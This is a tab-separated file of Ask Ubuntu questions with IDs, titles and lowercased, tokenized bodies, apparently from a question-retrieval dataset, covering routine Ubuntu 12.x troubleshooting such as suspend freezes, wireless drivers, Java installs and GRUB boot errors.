260771	blank screen after resume from suspend	i have a new lenovo z475 that i loaded ubuntu 12.10 amd64+mac version onto . everything works well except when i open the lid of my laptop after having closed it . it seems to freeze . i ca n't ping it or anything . i have amd vision chipset . i have a radeon hd 6520g using the x.org driver . /var/log/pm-suspend.log shows : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed .
260774	ubuntu 12.10 , where is terminal ?	is a amd 64 athlon processor support by ubuntu 12.10 ? thanks .
260775	how do i set classpath variable for tomcat in 12.10 ?	previously , i have set the java_home path using the terminal with the following command : export java_home= '' /usr/lib/jvm/java-7-openjdk-i386 '' > > ~/.bashrc now , i want to set the classpath environment variable to include the servlet-api.jar . basically , what i am trying to achieve is that i should not need to type the classpath to servlet-api.jar every time i compile a java program nor should i have to type -cp . when compiling a regular java program whose .class file is in the same directory i am a newbie from windows so please a step-by-step guide would be appreciated !
260777	how to migrate an encrypted lvm install to a new disk	i have a somewhat customised laptop install i want to move to a ssd directly , without having to reinstall ubuntu , reinstall all the apps and make all the other changes again . the ssd is smaller , so i ca n't just do dd . the original install was done with the ubuntu alternate installer , selecting the full disk encryption with lvm option . what steps are required and how do i do them ? i expect to have to : set up the disk partitions , encryption etc copy the data across install grub and get it working with new uuid values etc .
260782	how to switch from core layout to full screen layout ? pagestack header annoying	i want switch from a core layout to a full screen layout when clicking somewhere in the core layout . i use pagestack to get the switching with back button and stuff tabs to have something resembling the core layout out of the box and because i need it in the future to flick horizontally my problem is , that pagestack introduces some dark header which is nowhere seen in the design pages . i modified ubuntu.components.pagestack to expose the header.visible property to fix this for my app in progress . i grepped through the example apps , for example the gallery-app , but found nothing useful . maybe too much work around-code-there also . so what is the canonical ( schenkelklopf ) way of stacking tabs and some full screen page ? i guess it 's just not quite ready yet etc . and inconsistencies are a temporal state right now arising from the development rush of ubuntu ? as an example i made up this code : import qtquick 2.0 import ubuntu.components 0.1 mainview { width : units.gu ( 40 ) height : units.gu ( 71 ) pagestack { id : pagestack anchors.fill : parent component.oncompleted : push ( auberginepage ) tabs { id : auberginepage anchors.fill : parent tab { title : `` awesome ? '' page : rectangle { anchors.fill : parent ; visible : false color : `` # 2c001e '' mousearea { anchors.fill : parent ; onclicked : pagestack.push ( orangepage ) } } } } rectangle { id : orangepage color : `` # dd4814 '' visible : false anchors.fill : parent } } }
260785	gcc or cc no longer seems to work in 12.04 lts	i recently installed 12.04 lts and i would like to compile short c programs . when i enter gcc or cc at the command promp to compile a simple test program `` test.c '' i get the following : test.c : in function ‘main’ : test.c:6:1 : error : stray ‘\342’ in program test.c:6:1 : error : stray ‘\200’ in program test.c:6:1 : error : stray ‘\234’ in program test.c:6:1 : error : stray ‘\342’ in program test.c:6:1 : error : stray ‘\200’ in program test.c:6:1 : error : stray ‘\235’ in program test.c:6:11 : error : ‘test’ undeclared ( first use in this function ) test.c:6:11 : note : each undeclared identifier is reported only once for each function it appears in do i need to install other software ( other than gcc ? sincerely , bruce
260787	how drop an audio stream using avconv ?	how do i drop audio from a mkv with dts encoding ? i am using this command avconv -i movie.mkv -c : v copy movie.mp4 . i know the command would include the codec command but i do n't know how to use it .
260791	i ca n't extract tar.bz2 file : error message , .h file : permission denied	i 'm trying to extract r8101-1.023.00.tar.bz2 file , it 's a driver ( linux driver for kernel 3.x and 2.6.x and 2.4.x ) from [ realtek.com ] [ realtek ] . the fact is i get an error message : error to open the file ... /r8101-1.023.00/src/rtltool.h '' : permission denied '' . any ideas ? [ realtek ] : http : //www.realtek.com.tw/downloads/downloadsview.aspx ? langid=1 & pnid=14 & pfid=7 & level=5 & conn=4 & downtypeid=3 & getdown=false # 2 what i get after tar -xjvf r8101-1.023.00.tar.bz2 r8101-1.023.00/ r8101-1.023.00/src/ r8101-1.023.00/src/rtltool.h tar : r8101-1.023.00/src/rtltool.h : no se puede [ it ca n't be ] open : permiso denegado [ permission denied ] r8101-1.023.00/src/rtl_eeprom.h tar : r8101-1.023.00/src/rtl_eeprom.h : no se puede open : permiso denegado r8101-1.023.00/src/r8101.h tar : r8101-1.023.00/src/r8101.h : no se puede open : permiso denegado r8101-1.023.00/src/r8101_n.c tar : r8101-1.023.00/src/r8101_n.c : no se puede open : permiso denegado r8101-1.023.00/src/rtl_ethtool.h tar : r8101-1.023.00/src/rtl_ethtool.h : no se puede open : permiso denegado r8101-1.023.00/src/rtl_eeprom.c tar : r8101-1.023.00/src/rtl_eeprom.c : no se puede open : permiso denegado r8101-1.023.00/src/makefile_linux24x tar : r8101-1.023.00/src/makefile_linux24x : no se puede open : permiso denegado r8101-1.023.00/src/makefile tar : r8101-1.023.00/src/makefile : no se puede open : permiso denegado r8101-1.023.00/src/rtltool.c tar : r8101-1.023.00/src/rtltool.c : no se puede open : permiso denegado r8101-1.023.00/autorun.sh r8101-1.023.00/readme r8101-1.023.00/makefile tar : saliendo con fallos debido a errores anteriores [ exiting with failure due to previous errors ] what i get with sudo tar -xjvf r8101-1.023.00.tar.bz2 r8101-1.023.00/ r8101-1.023.00/src/ r8101-1.023.00/src/rtltool.h r8101-1.023.00/src/rtl_eeprom.h r8101-1.023.00/src/r8101.h r8101-1.023.00/src/r8101_n.c r8101-1.023.00/src/rtl_ethtool.h r8101-1.023.00/src/rtl_eeprom.c r8101-1.023.00/src/makefile_linux24x r8101-1.023.00/src/makefile r8101-1.023.00/src/rtltool.c r8101-1.023.00/autorun.sh r8101-1.023.00/readme r8101-1.023.00/makefile
260792	why are my photos not being saved in shotwell ?	after cropping a picture in shotwell , and rotating it , the original photograph has not been altered and is still the same . however when i go to the shotwell `` library '' they are shown as being cropped/rotated . why are they not being saved properly ?
260793	uefi boot results in a black screen	i recently bought a new dell ultrabook with uefi active . i want to install ubuntu alongside windows 8 so that i can dual boot between them . so i installed ubuntu 12.10 ( 64-bit ) on usb drive . after disabling the secure boot feature it allowed me to enter the boot menu in which i selected the usb flash drive ( uefi mode ) . it gave me a black screen with the option to install ubuntu in a clear white font . when i selected the option the screen turned black , the led on the usb drive started flashing and then stopped after a few seconds . nothing happened . so i tried burning ubuntu on a dvd . same results . i really want the dual booting option , and erasing windows is unfortunately not an option . has anybody got a solution to this problem ? thanks !
260798	trying to install java	i 'm extremely new to linux and wanted to run a server but the program want to run requires linux . im trying to run this command via ssh to my server but receive this every time . sudo apt-get install sun-java6-bin sun-java6-jdk sun-java6-jre but i reccieve this . user @ serverubuntu : ~ $ sudo apt-get install sun-java6-bin sun-java6-jdk sun-java6-jre [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done package sun-java6-jre is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package sun-java6-jdk is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package sun-java6-bin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'sun-java6-bin ' has no installation candidate e : package 'sun-java6-jdk ' has no installation candidate e : package 'sun-java6-jre ' has no installation candidate user @ serverubuntu : ~ $ sudo apt-get install sun-java7-bin sun-java7-jdk sun-java7-jre reading package lists ... done building dependency tree reading state information ... done e : unable to locate package sun-java7-bin e : unable to locate package sun-java7-jdk e : unable to locate package sun-java7-jre user @ serverubuntu : ~ $ sorry im extremely new to linux and dont know how to do much . thanks : )
260803	lost internet connection when upgraded from 12.04 to 12.10	i do n't have virtualbox and i 'm not really good with codes and stuff , but i updated my machine from 12.04 to 12.10 and now the internet is not working . the only message i got was 'nautilus has not started ' when i open chrome : error 105 ( net : :err_name_not_resolved ) : unable to resolve the server 's dns address . i tried sudo apt-get install dnsmasq but it came back with the following : e : unable to locate package dnsmasg . then reading package list ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libcd4 libequinox-osgi-java libgraph4 libgvc5 libpathplan4 libservlet3.0-java use 'apt-get autoremove ' to remove them . the following new package will be installed dnsmasq 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 16.1kb of archives after this operation , 115 kb of additional disk space will be used . warning : the following packages can not be authenticated ! dnsmasq install these packages without verification [ y/n ] ? y err http : //gb.archive.ubuntu.com/ubuntu/ quantal/universe dnsmasq all 2.63-1ubuntu1 something wicked happened resolving 'gb.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/universe/d/dnsmasq/dnsm asq_2.63-1ubuntu1_all.deb something wicked happened resolving 'gb.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? ****** @ desktop : ~ $ apt-get autoremove e : could not open lock file /var/lib/dpkg/lock 0 open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i 've also deleted the wired connection then added it back to all default settings , but am still having no joy whatsoever . i am on a wired connection . i have rebooted computer and modem . i have also tried google dns 8.8.8.8 8.8.4.4 please help : )
260810	how can i read and remove meta ( exif ) data from my photos using the command line ?	just looked this up . figure i 'd share it here for future reference .
260813	trying to install steam error : you are missing the following 32-bit libraries , and steam may not run : not	i 've already installed steam but when i click on the program i get this message error- you are missing the following 32-bit libraries , and steam may not run : not i dont know what to install or even do i 've tried to look answers up but i got nothing ...
260817	ubuntu 12.10 no wifi after updates	my wifi disappeared after 80 software updates package from ubuntu . im new to ubuntu . im using acer aspire 5742 . the wifi was there after the installation of ubuntu but after i did the updates my wifi no longer works .
260823	how to get a clock in unity top panel ?	i installed ubuntu 12.10 , 64-bit , i had a clock up in the top right of the top menu panel . i noticed the other day that it is no longer there . i 've scoured all the settings and everything in ubuntu tweak , but i ca n't find any way to get it back . how do i get my clock back on unity top panel ?
260826	which file containts all_proxy variable ?	i wonder which file contains all_proxy variable which is being set by network manager so i could update it manually .
260829	`` b43.blacklist '' , successful boot - what next for working wireless ?	a definite newbie to ubuntu and despite lots of ignorance , i 've understood just enough to have got 12.04 installed and looking good on my old acer aspire 3003wlmi . however , after days of not being able to boot from the hard drive , only via the live usb stick that was used for the install , it seems that it is the wireless card/driver/thingy that makes it hang . i found and followed eliah 's solution to get past the hangs and into the desktop . however , as i understand it , this leaves me with no working wireless connection . what should i do from here to restore the wireless service , but still be able to log in and use the computer ? i 've previously installed 12.10 which worked well , wireless network included , but with an awful display resolution , so i assume there is a solution for the earlier os ? thanks in advance
260830	command-line way to view information about a ppa ?	lets imagine i have a added a repository called ppa : something/amazing , but i have forgotten what the ppa was all about and the name of the ppa is too vague or the ppa is a very large one . i want to check what it is without using an internet browser and going to the launchpad website . is there a way to view information about the ppa from the command line ? i am mainly interested viewing a list of the packages contained in the ppa .
260832	update grayed out ( xorg x server -- qxl display driver )	i 've been ignoring this issue for a while since it did n't effect anything on my system . but its annoying to watch this one little update graded out while the rest of the updates get installed . any solutions ?
260833	wubi 12.04 hangs on startup	after looking around this site for a while i ca n't seem to find a working solution for wubi . so i installed ubuntu 12.04 the other day via a wubi install with windows 7 home premium , giving it 18 gb . it worked perfectly fine up until now but it consistently hangs on startup now . specifically , after selecting ubuntu in the options for os 's it goes to the purple screen , waits a moment and then displays `` ubuntu '' with the 5 white dots below it . the dots fill in orange one-by-one , and then the system hangs . we have tried to leave it to see if it boots but it seems to never leave that screen ( up until now it took 30 seconds or so ) . windows still starts up without issue . there has been one exception where it did boot up but after logging in it displayed one monitor as black and my primary monitor had a single purple bar along the top , the only way to get it to turn off was to force shut down by holding the power button . additional details are : windows 7 home premium for our primary os , nvidea geforce 550 gtx titanium overclocked ( on ubuntu we installed the latest `` stable '' driver but there is a newer version however it hasnt affected previous startups in any way ) , intel i3 3.07 ghz processor , and i 'm not sure if we have the grub , grub 2 , or grub legacy boot loader . any and all help is greatly appreciated ! edit : after posting this question i tried again just to see if it would somehow just magically fix , but it seems to have degraded . it now does not even attempt to start ubuntu , it instead displays the 2 lines try ( hd0,0 ) ntfs5 : no bubildr try ( hd0,1 ) ntfs5 : error ; `` prefix '' is not set and then it moves to a new screen with : gnu grub version 1.49-21ubuntu3.9 minimal bash-like line editing is supported . for the first work , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > so it apparently is waiting for some bash commands but i am not sure how to use this ( if you are supposed to ) in order to fix it . i assume based on the `` no bildr '' and prefix thing that my boot loader is broken .
260835	my wireless wo n't connect in ubuntu 12.04 lts , newly installed on my dell inspiron 1525	i am a brand new user to ubuntu ( all of my previous experience being in windows ) . i have recently begun to dual boot for the sake of work , so i installed ubuntu 12.04 on my dell inspiron 1525 . it possesses a broadcom bcm4312 wireless card . i have no troubles getting an ethernet connection to work , but my wireless is acting odd , to say the least . i can see all available networks ( obviously including my own ) , but whenever i try to connect to it , it repeatedly asks me to authenticate the connection . i am absolutely positive that i am inserting the correct passphrase ( wpa security setting ) , but it refuses to connect . i have browsed and tried other responses to no avail , but i am completely new to ubuntu and have no idea what some of the terminal commands are actually doing , so it could be user error . anyone out there willing to give me some help ? thanks . edit : terminal responses lscpi -nn response : 00:00.0 host bridge [ 0600 ] : intel corporation mobile pm965/gm965/gl960 memory controller hub [ 8086:2a00 ] ( rev 0c ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) [ 8086:2a02 ] ( rev 0c ) 00:02.1 display controller [ 0380 ] : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) [ 8086:2a03 ] ( rev 0c ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 [ 8086:2834 ] ( rev 02 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 [ 8086:2835 ] ( rev 02 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 [ 8086:283a ] ( rev 02 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 02 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 2 [ 8086:2841 ] ( rev 02 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 5 [ 8086:2847 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev f2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hm ( ich8m ) lpc interface controller [ 8086:2815 ] ( rev 02 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller [ 8086:2850 ] ( rev 02 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] [ 8086:2829 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801h ( ich8 family ) smbus controller [ 8086:283e ] ( rev 02 ) 02:09.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] ( rev 05 ) 02:09.1 sd host controller [ 0805 ] : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter [ 1180:0822 ] ( rev 22 ) 02:09.2 system peripheral [ 0880 ] : ricoh co ltd r5c592 memory stick bus host adapter [ 1180:0592 ] ( rev 12 ) 02:09.3 system peripheral [ 0880 ] : ricoh co ltd xd-picture card controller [ 1180:0852 ] ( rev 12 ) 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 12 ) 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) lsmod response : module size used by michael_mic 12541 8 arc4 12474 4 snd_hda_codec_idt 60238 1 snd_hda_codec_hdmi 31778 1 gpio_ich 13160 0 joydev 17394 0 hid_generic 12485 0 dell_wmi 12602 0 sparse_keymap 13659 1 dell_wmi dell_laptop 17210 0 dcdbas 14099 1 dell_laptop coretemp 13362 0 microcode 18396 0 parport_pc 32115 0 ppdev 12850 0 rfcomm 38104 12 bnep 17791 2 r852 17906 0 sm_common 16773 1 r852 snd_hda_intel 33029 3 snd_hda_codec 116477 3 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13277 1 snd_hda_codec usbhid 46054 0 hid 82511 2 hid_generic , usbhid uvcvideo 72249 0 videobuf2_core 32212 1 uvcvideo videodev 100265 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12757 1 uvcvideo videobuf2_memops 13213 1 videobuf2_vmalloc r592 17809 0 memstick 15886 1 r592 snd_pcm 81124 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec psmouse 91022 0 serio_raw 13032 0 btusb 17952 0 bluetooth 189585 24 rfcomm , bnep , btusb nand 49703 2 r852 , sm_common nand_ids 8548 1 nand mtd 38671 2 sm_common , nand nand_bch 13004 1 nand bch 21768 1 nand_bch nand_ecc 13106 1 nand lpc_ich 16993 0 lib80211_crypt_tkip 17276 0 mac_hid 13078 0 wl 2906598 0 snd_seq_midi 13133 0 i915 470823 3 cfg80211 181041 1 wl lib80211 14041 2 lib80211_crypt_tkip , wl drm_kms_helper 47459 1 i915 snd_rawmidi 25426 1 snd_seq_midi wmi 18745 1 dell_wmi drm 240232 4 i915 , drm_kms_helper snd_seq_midi_event 14476 1 snd_seq_midi i2c_algo_bit 13317 1 i915 video 19070 1 i915 snd_seq 51594 2 snd_seq_midi , snd_seq_midi_event snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14138 3 snd_seq_midi , snd_rawmidi , snd_seq snd 62675 16 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14636 1 snd snd_page_alloc 14109 2 snd_hda_intel , snd_pcm lp 17456 0 parport 40931 3 parport_pc , ppdev , lp firewire_ohci 36110 0 firewire_core 61957 1 firewire_ohci crc_itu_t 12628 1 firewire_core sdhci_pci 18263 0 sdhci 32293 1 sdhci_pci sky2 53629 0
260836	error while installing ubuntu 12.10 from usb	os : windows 8 i was able to boot the laptop from usb with ubuntu 12.10 installed on it , but when trying to install ubuntu and reaching the installation type step , there is this error : `` ubuntu 12.10 has experienced and error '' so i would like to get help with this issue . thank you
260837	how to set chromium to open word documents with libreoffice ?	when i click on a word attachment in an email i have received in gmail from chromium , it always opens the file using abiword . how can i persuade it to use libreoffice instead ? i am using lubuntu 12.10 .
260838	system apparently does n't recognize usb microphone input	i purchased an audio technica usb microphone a while ago , but my system does n't recognise input into it . when i plug it in and open audacity , i see the microphone input options ( such as 'atr usb microphone : usb audio ( hr:1,0 ) : line:1 ' ) . however , whenever i try to record anything i only wind up with only a flat line ( indicating that there 's no input ) . arecord -l gives this : default playback/recording through the pulseaudio sound server sysdefault : card=nvidia hda nvidia , alc662 rev1 analog default audio device front : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog front speakers surround40 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 4.0 surround output to front and rear speakers surround41 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 5.0 surround output to front , center and rear speakers surround51 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 7.1 surround output to front , center , side , rear and woofer speakers dmix : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct sample mixing device dmix : card=nvidia , dev=2 hda nvidia , alc662 rev1 analog direct sample mixing device dsnoop : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct sample snooping device dsnoop : card=nvidia , dev=2 hda nvidia , alc662 rev1 analog direct sample snooping device hw : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct hardware device without any conversions hw : card=nvidia , dev=2 hda nvidia , alc662 rev1 analog direct hardware device without any conversions plughw : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog hardware device with all software conversions plughw : card=nvidia , dev=2 hda nvidia , alc662 rev1 analog hardware device with all software conversions sysdefault : card=microphone atr usb microphone , usb audio default audio device front : card=microphone , dev=0 atr usb microphone , usb audio front speakers surround40 : card=microphone , dev=0 atr usb microphone , usb audio 4.0 surround output to front and rear speakers surround41 : card=microphone , dev=0 atr usb microphone , usb audio 4.1 surround output to front , rear and subwoofer speakers surround50 : card=microphone , dev=0 atr usb microphone , usb audio 5.0 surround output to front , center and rear speakers surround51 : card=microphone , dev=0 atr usb microphone , usb audio 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=microphone , dev=0 atr usb microphone , usb audio 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=microphone , dev=0 atr usb microphone , usb audio iec958 ( s/pdif ) digital audio output dmix : card=microphone , dev=0 atr usb microphone , usb audio direct sample mixing device dsnoop : card=microphone , dev=0 atr usb microphone , usb audio direct sample snooping device hw : card=microphone , dev=0 atr usb microphone , usb audio direct hardware device without any conversions plughw : card=microphone , dev=0 atr usb microphone , usb audio hardware device with all software conversions i 've no idea what any of the above means but i was told giving this output would help . does anybody have any suggestions of what to do in this situation ? if there 's something else i can elaborate upon , please tell me and i 'll be happy to explain further . thank you in advance ! edit : here 's what i got when i inputted amixer into the terminal : simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 54 [ 84 % ] [ -10.00db ] [ on ] simple mixer control 'headphone',0 capabilities : pswitch penum playback channels : front left - front right mono : front left : playback [ on ] front right : playback [ on ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 254 [ 100 % ] [ 0.20db ] front right : playback 254 [ 100 % ] [ 0.20db ] simple mixer control 'front',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 64 [ 100 % ] [ 0.00db ] [ on ] front right : playback 64 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'front mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'front mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ] simple mixer control 'surround',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 64 [ 100 % ] [ 0.00db ] [ on ] front right : playback 64 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'center',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 64 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'lfe',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 64 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'line',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'iec958 default pcm',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 11 [ 35 % ] [ 3.00db ] [ on ] front right : capture 11 [ 35 % ] [ 3.00db ] [ on ] simple mixer control 'capture',1 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 23 [ 74 % ] [ 21.00db ] [ on ] front right : capture 23 [ 74 % ] [ 21.00db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled' simple mixer control 'channel mode',0 capabilities : enum items : '2ch ' '4ch ' '6ch' item0 : '2ch' simple mixer control 'digital',0 capabilities : cvolume penum capture channels : front left - front right limits : capture 0 - 120 front left : capture 60 [ 50 % ] [ 0.00db ] front right : capture 60 [ 50 % ] [ 0.00db ] simple mixer control 'input source',0 capabilities : cenum items : 'rear mic ' 'front mic ' 'line' item0 : 'line' simple mixer control 'input source',1 capabilities : cenum items : 'rear mic ' 'front mic ' 'line' item0 : 'front mic' simple mixer control 'rear mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ on ] front right : playback 0 [ 0 % ] [ -34.50db ] [ on ] simple mixer control 'rear mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ]
260842	how to determine pidgin install path	i 'm trying to determine the install location of pidgin so i can add it to my application startup . i 've looked at top but it does n't show paths . how can i find out where it 's installed ?
260845	run a command as user at boot time ubuntu 12.04	i want to run a command at boot time that basically looks like this : python /home/me/.hidden/commnd.py also , this needs to run as me , not root . i know it can be done , but my google-fu is weak today . btw , this is a headless server , so starting at login is n't a solution .
260851	permanently disable hdmi audio device	how can i permanently disable my ati hdmi audio device ? i have tried setting the profile for it to `` off '' but it does n't seem to stick either across reboots or when certain applications are launched .
260858	help setting up e4rat , no startup.log after e4rat-collect	so i 've scanned through all the wiki 's and posts to no avail . i 'm attempting to set up e4rat on ubuntu 12.10 , and after appending init=/sbin/e4rat-collect to grub and changing ro to rw startup.log is still failing to appear . this is the output to dmesg | grep e4rat lenny @ ubuntu : ~ $ dmesg | grep e4rat [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.5.0-25-generic root=uuid=d018d9ce18d9b426 loop=/ubuntu/disks/root.disk rw quiet splash init=/sbin/e4rat-collect vt.handoff=7 [ 0.000000 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-25-generic root=uuid=d018d9ce18d9b426 loop=/ubuntu/disks/root.disk rw quiet splash init=/sbin/e4rat-collect vt.handoff=7 [ 28.777556 ] e4rat-collect : failsafe main process ( 955 ) killed by term signal [ 38.227687 ] e4rat-collect : lightdm main process ( 1217 ) killed by term signal anyone think they can help ?
260863	upgrade from 8.04 to 10.04 , `` no release found ''	i 've run the following commands as root : apt-get update apt-get upgrade apt-get dist-upgrade all work fine , but then i run do-release-upgrade and it says `` no new release '' . this makes no sense as i 've upgraded a clone of this machine in the past and it went straight to 10.04 . i can get out to the internet fine . any ideas why this might be ?
260864	changing to old-style layout in ubuntu 12.10 will help avoid unity/nvidia clash	long story below , question here ** alright , thanks to you guys i know it 's possible to get the old layout in ubuntu , by following this guide : is there classic mode in ubuntu 12.10 ? but , is this merely a kind of skin for the unity/combiz parts ? i 'm thinking if it 's a skin the problems between that and nvidia will still persist . -- -- -- -- -- -- - long story -- -- -- -- -- -- i am fairly new to ubuntu and linux based os ' in general . anyway , as i have decided to go ubuntu , i have met the problem of nvidia cards ( and in my case optimus based nvidia card ) . anyway , it 's the usual with unity/compiz not working as soon as i install drivers ( i have tried the standard drivers through the software center as well as different drivers from various solutions around the web . i also tried going back to ubuntu 11.04 to see if that would help , and what happened was i was able to run it in old-style layout ( not sure what 's it called , but squary and bar at top and bottom ) anyway , as i like this , my questions is as follows : can i get that layout to work in ubuntu 12.10 ? also will this help so that i can for example install bumblebee and avoid clashes with unity/compiz ?
260867	lost a saved gedit file	i saved a text file in gedit last night before shutting off my computer , and i remember what i named the file . when i turned on my computer this morning to load the file , i could not find it . i 've searched for the file , and i 've searched its content usinggrep , and i still have not found the file . when i open gedit , in the `` file '' drop-down menu it lists my most recent files , and the filename of the missing file is there , however , when i select it , there is no text , it is empty . it says it is located in /tmp but i can not find the file when i browse or search the filesystem . please help me
260876	what android apps work with gnote	i am trying to sync my ubuntu 12.10 gnotes with my n7 tablet through the ubuntu one cloud . i can do this without any problems . but once they are sync 'd with ubuntu one , what apps on my n7 can i read them with ? none of my android apps will allow sync with ubuntu one and none recognize the gnote format . any suggestions ?
260879	12.04.02 usb installer , x86 works , x64 does n't	so i downloaded both 32-bit and 64-bit flavors of 12.04.2 ( md5 checks out ) ; do n't want 12.10 since i prefer lts . i used universal usb installer http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ to make a bootable usb . 32-bit : usb boots , can get to live desktop and install , zero issues . 64-bit : usb boots , goes to menu ( where i can choose between live desktop , install , memtest , etc ) . live desktop and install do not work , it just makes a loud beep when i try to select ( like the beep from post ) and does nothing ( it stays at this menu ) . my laptop does indeed have a 64 bit cpu ( i am trying to set up dual boot , my other os is windows 7 home premium sp1 x64 , which is also a fresh re-install , if that matters ) . i also ran memtest earlier and there were no problems . help , please ? what could be the issue ? am i stuck with just 32 bit ?
